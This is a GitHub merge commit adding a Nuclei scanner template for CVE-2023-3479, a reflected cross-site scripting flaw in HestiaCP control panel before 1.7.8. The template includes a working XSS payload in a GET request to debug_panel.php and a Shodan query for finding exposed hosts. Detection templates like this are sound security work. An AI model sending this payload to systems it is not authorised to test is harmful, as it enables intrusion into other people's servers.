Merge pull request #7649 from edoardottt/main

Add CVE-2023-3479
projectdiscovery · Jul 10, 2023 · 167d0e2 · 167d0e2
2 parents 37c7001 + f942b15
commit 167d0e2
Showing 1 changed file with 45 additions and 0 deletions.
diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml
@@ -0,0 +1,45 @@
+id: CVE-2023-3479
+
+info:
+  name: Hestiacp <= 1.7.8 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
+  reference:
+    - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-3479
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-3479
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.favicon.hash:-476299640
+  tags: cve,cve2023,hestiacp,xss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}"><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'debug-panel'
+          - '<script>alert(document.domain)</script>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200